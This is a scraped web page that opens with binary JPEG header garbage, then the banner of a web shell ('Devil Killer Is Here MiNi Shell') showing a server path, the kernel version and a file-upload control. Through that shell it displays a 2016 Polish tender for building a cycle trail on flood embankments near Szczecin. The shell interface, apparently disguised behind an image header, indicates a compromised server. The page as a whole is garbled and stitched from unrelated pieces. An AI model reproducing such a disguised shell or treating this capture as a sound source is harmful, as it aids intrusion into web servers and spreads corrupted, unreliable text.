JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161228/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161228/374673-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zzmiuw.pl' target='_blank'>http://www.zzmiuw.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 374673 - 2016
              z dnia 2016-12-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szczecin: Zaprojektowanie i wykonanie  szlaku rowerowego na wale przeciwpowodziowym wzdłuż rzeki Chełszcząca i jeziora Dąbie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Regionalny Program Operacyjny Województwa Zachodniopomorskiego na lata 2014 - 2020 w osi 04.00.00 Naturalne otoczenie człowieka. 04.09.00 Rozwój Zasobów Endognicznych</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych w Szczecinie, krajowy numer identyfikacyjny
              103633600000, ul.
              ul. Teofila Firlika 
              19,
              71-637  
              Szczecin, woj.
              zachodniopomorskie, państwo
              Polska, tel.
              91 440 51 00, e-mail
              zamowienia@zzmiuw.pl, faks
              91 440 51 01.
              <br />
              Adres strony internetowej (URL): www.zzmiuw.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zzmiuw.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zzmiuw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zaprojektowanie i wykonanie  szlaku rowerowego na wale przeciwpowodziowym wzdłuż rzeki Chełszcząca i jeziora Dąbie<br /><b>Numer referencyjny: </b>NP/IF/333/71/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.2.	Miejsce realizacji: gmina Goleniów, gmina Stepnica, powiat goleniowski; gmina Wolin, powiat kamieński, województwo zachodnio - pomorskie.

1.2.1.	Szczegółowy wykaz działek wraz z właścicielami oraz władającymi podano w zestawieniu zawartym w Programie Funkcjonalno Użytkowym (zwanym dalej PFU), który stanowi załącznik nr 4 do niniejszej SIWZ. 

Wykonawca zobowiązany jest do zaprojektowania obiektów w granicach działek wału, wymienionych w załączniku nr 8 do niniejszej SIWZ, z uwzględnieniem ewentualnych podziałów geodezyjnych (stan ewidencyjny aktualny na X 2016r.) 
W toku prac projektowych, a przed uzyskaniem pozwolenia na budowę, strony dopuszczają możliwość wprowadzania niewielkich zmian i korekt dotyczących przebiegu i lokalizacji szlaku rowerowego lub lokalizacji zjazdów ze szlaku rowerowego obejmujących również zmianę działek, na których projektowany jest szlak rowerowy. 

UWAGA:
Odstępstwo od lokalizacji obiektów jest możliwe jedynie po uzgodnieniu z Zamawiającym oraz Pełnomocnikiem Marszałka ds. komunikacji rowerowej i dopełnieniu wszelkich formalności z tym związanych, w tym podziałów geodezyjnych i wydzieleń. Numery działek, ich przynależność do obrębów oraz właścicieli Zamawiający podaje według swojej najlepszej wiedzy, co nie zwalnia Wykonawcy z obowiązku dokładnego sprawdzenia i ewentualnej korekty tych informacji.

1.2.2.	 Stan istniejący


-Odbudowa wału przeciwpowodziowego nad Zalewem Szczecińskim: Stepnica - Kopice 
w km 0+000 - 9+158, Skoszewo - Czarnocin w km 0+000 - 10+090 oraz Stepnica - Brylanty 
w km 0+000 - 2+573  rok odbudowy 2013, ze środków PROW
-Odbudowa wału przeciwpowodziowego Skoszewo w km 27+000 - 29+300 nad Zalewem Szczecińskim  rok odbudowy 2012, ze środków PROW
Poprowadzenie szlaku rowerowego po wale przeciwpowodziowym wymaga szczególnego podejścia projektowego. 
Lokalizację szlaku rowerowego po koronie wałów przeciwpowodziowych umożliwia ustawa z dnia 4 kwietnia 2014r. o zmianie ustawy Prawo wodne oraz niektórych innych ustaw, niemniej należy przewidzieć potrzebę uzyskania pozwolenia wodno - prawnego.
Ze względu na położenie obiektów na obszarach Natura2000 należy przewidzieć uzyskanie Decyzji Środowiskowej oraz Decyzji Pozwolenia na Budowę wraz z innymi uzgodnieniami i decyzjami jakie w toku postepowania administracyjnego okażą się niezbędne do rozpoczęcia i zrealizowania robót budowlanych.
Szlak rowerowy nie może w sposób nadmierny oddziaływać negatywnie na tereny przyległe, 
w szczególności na środowisko. Należy przewidzieć działania minimalizujące negatywne oddziaływania oraz ewentualne potrzeby kompensacji środowiskowej. 
Szlaki rowerowe należy projektować w taki sposób, aby zapewnić następujące warunki użytkowania i parametry zgodne z obowiązującymi standardami:
	prędkość projektowa  30 km/h
	normalna szerokość trasy dwukierunkowej 2,5 m. W uzasadnionych przypadkach, ze względu na brak możliwości wykonania trasy o założonej szerokości, dopuszcza się jej zmniejszenie. Decyzja o ewentualnej zmianie podjęta zostanie po konsultacji z zamawiającym, zarządcą infrastruktury przeciwpowodziowej [ZZMiUW] oraz pełnomocnikiem marszałka ds. komunikacji rowerowej
	skrajnia pozioma 0,25 m, w uzasadnionych przypadkach dopuszcza się jej zmniejszenie za zgodą Zamawiającego, zarządcy infrastruktury przeciwpowodziowej [ZZMiUW] oraz pełnomocnika marszałka ds. komunikacji rowerowej
	pochylenie niwelety max. 6%
UWAGA  Podane wyżej parametry należy traktować jako wytyczne standardowe w procesie projektowym. Każde odstępstwo od powyższych należy uzasadnić, na co może mieć wpływ charakter projektowanej budowli i potrzebę dostosowania szlaku do przebiegu i kształtu wału przeciwpowodziowego, a nie odwrotnie. 
Projektowanie szlaków rowerowych na koronie wałów przeciwpowodziowych wymaga uwzględnienia trudnych i zmiennych warunków gruntowo-wodnych. Przyjęta do wykonania nawierzchnia wraz z podbudową musi być wykonana z uwzględnieniem potencjalnych wahań wód gruntowych, wzmożonej filtracji pod koroną wału oraz pracy całej konstrukcji w związku z dużą miąższością torfów pod wałem i zjawiskiem osiadania biernego całego korpusu. 

Zakres dokumentacji projektowej oraz prac budowlano  montażowych przewidzianych 
do realizacji we wszystkich częściach zamówienia obejmuje:
Część I  prace projektowe wraz z dostarczeniem Zamawiającemu wszystkich materiałów niezbędnych do uzyskania decyzji administracyjnych, w tym także czynny udział w prowadzonych przez Zamawiającego procedurach administracyjnych. Wykonawca zobowiązany jest na wezwanie Zamawiającego uzupełniać dokumentację, a także przygotowywać materiały i odpowiedzi w prowadzonym procesie administracyjnym. Niezbędne jest także uzyskanie przez Wykonawcę uzgodnień z zarządcą infrastruktury przeciwpowodziowej [ZZMiUW], pełnomocnikiem Marszałka Województwa Zachodniopomorskiego ds. komunikacji rowerowej, jednostkami branżowymi, właścicielami prywatnymi (jeżeli takie uzgodnienia będą potrzebne), a także dostarczenie innych dokumentów niezbędnych do uzyskania decyzji administracyjnych, umożliwiających rozpoczęcie prac budowlano-montażowych.

1.2.3.	Charakterystyka zadań 
Podstawowe parametry techniczne wałów przeciwpowodziowych w poszczególnych zadaniach podano w PFU, który stanowi załącznik nr 4 do niniejszej SIWZ.

WAŻNE!

Wykonawca zaprojektuje, wybuduje i odda do użytkowania w stanie wolnym od wad i usterek szlak rowerowy o długości około 17.630 m (długość wału  długość projektowanej ścieżki może się różnić w niewielkim stopniu), zlokalizowany w województwie Zachodniopomorskim, przebiegający wzdłuż rzeki Iny oraz Zalewu Szczecińskiego na odcinku biegnącym wałami przeciwpowodziowymi lub w powiązaniu z infrastrukturą wałów przeciwpowodziowych.

Przebieg szlaków należy zaprojektować oraz wykonać zgodnie z treścią PFU i obowiązującym prawodawstwem, uwzględniając zalecenia i uwagi przekazane przez zarządcę infrastruktury przeciwpowodziowej oraz Pełnomocnika Marszałka ds. komunikacji rowerowej.

1.2.4.	Ogólne właściwości funkcjonalno  użytkowe
Podstawowe wymagania w zakresie właściwości funkcjonalno - użytkowych podano w PFU, który stanowi załącznik nr 4 do niniejszej SIWZ

Jedne z najważniejszych wymienionych tam wymagań to:
	Szlaki rowerowe należy zaprojektować w taki sposób, aby istniała możliwość wjechania na wał sprzętem mechanicznym do koszenia  skarp wału bez zniszczenia projektowanego szlaku rowerowego. Równocześnie należy przewidzieć zabezpieczenie wjazdów, aby uniemożliwić wjazd pojazdów innych niż obsługi technicznej, np. poprzez szlabany i słupki umieszczone w odpowiednich miejscach przy wjazdach.
	Wymaga się, by konstrukcja szlaku była zaprojektowana i wykonana w sposób oraz z materiałów zapewniających jej bezpieczeństwo przed rozmyciem.
	Ponadto w projekcie należy uwzględnić dowiązanie szlaku rowerowego do istniejącego systemu dróg, po których prowadzony będzie ruch rowerowy
	Szlak rowerowy należy dostosować do istniejącej korony wału, 
	Należy przewidzieć i uwzględnić przestrzeń na lokalizację oznakowania pionowego oraz samo oznakowanie. 
1.3.	Zakres i opis ogólny przedmiotu zamówienia:
Zakres przedmiotu zamówienia obejmuje zaprojektowanie oraz wykonanie szlaków rowerowych na wałach przeciwpowodziowych. 
Szlaki rowerowe na wałach przeciwpowodziowych są niezwykle atrakcyjne dla ruchu rowerowego ze względu na najmniejsze możliwe pochylenia i przewyższenia. Mają za zadanie zapewnić ciągłość ruchu rowerowego, umożliwić dostępność rowerzystom do dróg publicznych, miejsc charakterystycznych i atrakcji turystycznych.

Przedmiotowe zamówienie stanowi element koncepcji budowy spójnej sieci szlaków rowerowych w Województwie Zachodniopomorskim, realizowanej i zlecanej przez Urząd Marszałkowski Województwa Zachodniopomorskiego, a także jednostki organizacyjne samorządu Województwa Zachodniopomorskiego w tym zwłaszcza Zachodniopomorski Zarząd Dróg Wojewódzkich w Koszalinie oraz Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych.

Zadanie dzieli się na część projektową wraz z uzyskaniem decyzji administracyjnych oraz część budowlano-montażową. 

Poprowadzenie szlaku rowerowego po wale przeciwpowodziowym wymaga szczególnego podejścia projektowego. 
Lokalizację szlaku rowerowego po koronie wałów przeciwpowodziowych umożliwia ustawa 
z dnia 4 kwietnia 2014r. o zmianie ustawy Prawo wodne oraz niektórych innych ustaw, niemniej należy przewidzieć potrzebę uzyskania pozwolenia wodno - prawnego.
Ze względu na położenie obiektów na obszarach Natura 2000 należy przewidzieć uzyskanie Decyzji Środowiskowej oraz Decyzji Pozwolenia na Budowę wraz z innymi uzgodnieniami i decyzjami jakie w toku postępowania administracyjnego okażą się niezbędne do rozpoczęciai zrealizowania robót budowlanych.
Szlak rowerowy nie może w sposób nadmierny oddziaływać negatywnie na tereny przyległe, 
w szczególności na środowisko. Należy przewidzieć działania minimalizujące negatywne oddziaływania oraz ewentualne potrzeby kompensacji środowiskowej. 
Szlaki rowerowe należy projektować w taki sposób, aby zapewnić następujące warunki użytkowania i parametry zgodne z obowiązującymi standardami:

Przebieg i specyfikacja techniczna szlaku rowerowego powinna być zgodna z Koncepcją sieci tras rowerowych Pomorza Zachodniego, (aktualną wersją dokumentu) opracowanego przez Regionalne Biuro Gospodarki Przestrzennej Województwa Zachodniopomorskiego. Wszelkie odstępstwa od ww. koncepcji, zwłaszcza dotyczące lokalizacji i technologii wykonania oraz projektowanych parametrów jezdnych należy uzgodnić z Zamawiającym.

Do zadań projektanta należy wytyczenie geodezyjne szlaku, określenie punktów wysokościowych i odpowiednich rzędnych terenowych. Zamawiający przewiduje wykonanie szlaku rowerowego w technologii wymiany wierzchniej warstwy korony wału na szerokości 2,50 m i zastąpienia jej geokratą na geokompozycie, wypełnioną kruszywem łamanym oraz przykrytą warstwą kruszywa łamanego. Do zadań Projektanta należeć będzie analiza doboru nawierzchni i ewentualnie zaproponowanie innego, co najmniej równie korzystnego dla Zamawiającego wariantu. Ostateczny wybór wariantu nawierzchni uzależniony jest od istniejących warunków technicznych umożliwiających jej wykonanie na wale przeciwpowodziowym oraz zgody Zamawiającego. Przyjęta technologia wykonania nawierzchni powinna odpowiadać standardom ruchu rowerowego, uwzględniać istniejące warunki i stan techniczny wału przeciwpowodziowego oraz umożliwiać poruszanie się po wale pojazdów technicznych. Należy przewidzieć odcinkowe wyrównanie rzędnej korony wału do rzędnej wynikającej z przyjętej klasy wału przeciwpowodziowego po zakończeniu robót budowlanych. Na planowanym odcinku należy przewidzieć lokalizację wjazdów i zjazdów rowerowych z wału przeciwpowodziowego, wykonanie oznakowania pionowego i/lub poziomego, oświetlenia i zabezpieczenia miejsc potencjalnie niebezpiecznych (np. zwężenie korony wału w rejonie budowli wałowych i przejść nad kanałami) oraz wykonanie zabezpieczeń uniemożliwiających nieuprawnione poruszanie się po wale pojazdów mechanicznych. Należy przewidzieć odpowiednie profilowanie podłużne i poprzeczne nawierzchni szlaku. Należy przewidzieć umiejscowienie w wybranym przez Zamawiającego miejscu elektronicznego licznika rowerowego. Przyjęta technologia wykonania oraz realizacja inwestycji nie może w ujemny sposób wpływać na pełnienie przez wał funkcji ochrony przeciwpowodziowej.
Uwagi ogólne:
Wykonawca powinien przedstawić wstępne rozwiązania projektowe, oraz planowany harmonogram rzeczowo-finansowy, które zamierza zastosować w opracowaniu dokumentacji technicznej i realizacji robót, w formie pisemnej, do akceptacji przez Zamawiającego oraz zarządcę infrastruktury przeciwpowodziowej [ZZMiUW] w jego siedzibie (wersja robocza) przed przystąpieniem do stosowania ich w pracach projektowych, w ciągu 30 dni od dnia podpisania umowy.

1.4. Uszczegółowienie zakresu realizacji.
Szczegółowy zakres realizacji wszystkich prac do wykonania oraz  wytyczne standardów w projektowaniu ścieżek dla rowerów zawiera PFU, który stanowi załącznik nr 4 do niniejszej SIWZ.

Zakres przedmiotu zamówienia obejmuje zaprojektowanie oraz wykonanie szlaków rowerowych na wałach przeciwpowodziowych. 
Wybudowane szlaki rowerowe mają za zadanie zapewnić ciągłość ruchu rowerowego, umożliwić dostępność rowerzystom do dróg publicznych, miejsc charakterystycznych i atrakcji turystycznych. Szlaki rowerowe nie mogą zakłócać najważniejszej wiodącej funkcji wałów jaką jest ochrona przeciwpowodziowa miasta i obszarów rolnych i zabudowanych przed powodziami.
Wykonawca zaprojektuje, wybuduje i odda do użytkowania w stanie wolnym od wad i usterek szlak rowerowy o długości około 17.630 m (długość wału  długość projektowanej ścieżki może się różnić w niewielkim stopniu), zlokalizowany w województwie Zachodniopomorskim, przebiegający wzdłuż rzeki Iny oraz Zalewu Szczecińskiego na odcinku biegnącym wałami przeciwpowodziowymi lub w powiązaniu z infrastrukturą wałów przeciwpowodziowych. Przebieg szlaków należy zaprojektować oraz wykonać zgodnie z treścią PFU i obowiązującym prawodawstwem, uwzględniając zalecenia i uwagi przekazane przez zarządcę infrastruktury przeciwpowodziowej oraz Pełnomocnika Marszałka ds. komunikacji rowerowej.
Wskazane odcinki wałów przeciwpowodziowych zostały odbudowane w latach 2008-2015, podniesiono rzędne korony wału i dostosowano parametry do obowiązujących przepisów.
Obiekty wskazane poniżej odbudowane zostały ze środków unijnych [PROW 2007-2013] oraz krajowych [NFOŚiGW, WFOŚiGW, PdO]. Jednym z wymogów umów o dofinansowanie zadania jest zachowanie trwałości zadania przez 5 lat. Budowa szlaku rowerowego nie może naruszać podstawowej funkcji budowli jaką jest ochrona przeciwpowodziowa.

Wał odbudowany został w ramach poniższych zadań inwestycyjnych:
-Odbudowa wału przeciwpowodziowego nad rzeką Iną w km 0+000-5+300  rok odbudowy 2012, ze środków PROW.
-Ina  Inoujście Goleniów. Etap I Zadanie 3. Odbudowa koryta rzeki od km 5+440 do km 12+951 wraz z modernizacją prawobrzeżnego obwałowania [2,19km  wykonane ze środków PROW 2007-2013]  rok odbudowy 2010,
-Rzeka Ina Inoujście Goleniów. Odbudowa koryta rzeki w km 5+430-12+951 wraz z modernizacją prawobrzeżnego obwałowania, Etap I zad.3 Część I Modernizacja prawobrzeżnego obwałowania [4,4 km wykonane ze środków Programu dla Odry 2006 oraz WFOŚiGW]  rok odbudowy 2008,
-Odbudowa wału przeciwpowodziowego nad Zalewem Szczecińskim: Stepnica - Kopice 
w km 0+000 - 9+158, Skoszewo - Czarnocin w km 0+000 - 10+090 oraz Stepnica - Brylanty 
w km 0+000 - 2+573  rok odbudowy 2013, ze środków PROW,
-Odbudowa wału przeciwpowodziowego Skoszewo w km 27+000 - 29+300 nad Zalewem Szczecińskim  rok odbudowy 2012, ze środków PROW.
WAŻNE!
Przedmiotowe zamówienie stanowi element koncepcji budowy spójnej sieci szlaków rowerowych w Województwie Zachodniopomorskim, realizowanej i zlecanej przez Urząd Marszałkowski Województwa Zachodniopomorskiego, a także jednostki organizacyjne samorządu Województwa Zachodniopomorskiego w tym zwłaszcza Zachodniopomorski Zarząd Dróg Wojewódzkich w Koszalinie oraz Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych.

WAŻNE!
Ze względu na położenie obiektów na obszarach Natura 2000 należy przewidzieć konieczność uzyskania Decyzji Środowiskowej oraz Decyzji Pozwolenia na Budowę wraz z innymi uzgodnieniami i decyzjami jakie w toku postepowania administracyjnego okażą się niezbędne do rozpoczęcia i zrealizowania robót budowlanych.

WAŻNE!
Przyjęta do wykonania nawierzchnia wraz z podbudową musi być wykonana z uwzględnieniem potencjalnych wahań wód gruntowych, wzmożonej filtracji pod koroną wału oraz pracy całej konstrukcji (w przypadku występowania dużej miąższości torfów pod wałem i zjawiskiem osiadania biernego całego korpusu wału). 

Zakres dokumentacji projektowej oraz prac budowlano  montażowych przewidzianych 
do realizacji we wszystkich częściach zamówienia obejmuje następujące etapy:

Zadanie dzieli się na część projektową wraz z uzyskaniem decyzji administracyjnych oraz część budowlano-montażową. 

Etap I  prace projektowe wraz z dostarczeniem Zamawiającemu wszystkich materiałów niezbędnych do uzyskania decyzji administracyjnych, w tym także czynny udział w prowadzonych przez Zamawiającego procedurach administracyjnych.

Szczegółowy wykaz czynności okołoprojektowych, logistycznych i  wspomagających uzyskania decyzji administracyjnych i obowiązków wykonawcy do wykonania zawiera PFU, który stanowi załącznik nr 4 do niniejszej SIWZ.
 
Wykonawca zobowiązany jest do wykonania dokumentacji projektowej oraz prowadzenia prac zgodnie z obowiązującymi przepisami:
	rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.)
	Ustawą z dnia 18.07.2001r. - Prawo wodne (Dz. U. z 2015r poz. 469),  
	Ustawą z dnia 07.07.1994r. - Prawo budowlane (Dz. U. z 2013r., poz. 1409 z późn.zm), 
w tym projektu budowlano-wykonawczego i operatu wodnoprawnego w ilości egzemplarzy umożliwiającej uzyskanie niezbędnych pozwoleń oraz realizację robót budowlanych,
	Ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2013 r. poz. 1232 
z póź.zm.),
	Rozporządzenie Ministra Środowiska z dnia 20 kwietnia 2007r w sprawie warunków technicznych jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie (Dz.U.07.86.579).
	Standardy projektowe i wykonawcze dla tras rowerowych województwa zachodniopomorskiego.
	Ustawą Prawo o Ruchu Drogowym z 20 czerwca 1997 (D.U.2005.108.908 z póż.zm)
